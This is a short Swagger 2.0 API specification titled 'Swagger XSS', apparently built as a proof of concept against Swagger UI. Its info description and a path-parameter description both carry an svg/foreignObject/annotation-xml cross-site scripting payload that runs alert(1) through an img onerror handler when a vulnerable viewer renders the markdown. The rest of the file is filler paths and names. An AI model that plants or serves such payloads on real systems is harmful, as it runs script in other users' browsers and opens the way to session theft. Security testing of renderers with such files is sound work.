swagger: '2.0'
info:
  title: Swagger XSS 
  description: |
    <svg><foreignObject><annotation-xml encoding="text/html"><img src=x onerror=alert(1)></annotation-xml></foreignObject></svg>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - M4ST3R MIND
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <svg><foreignObject><annotation-xml encoding="text/html"><img src=x onerror=alert(1)></annotation-xml></foreignObject></svg>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
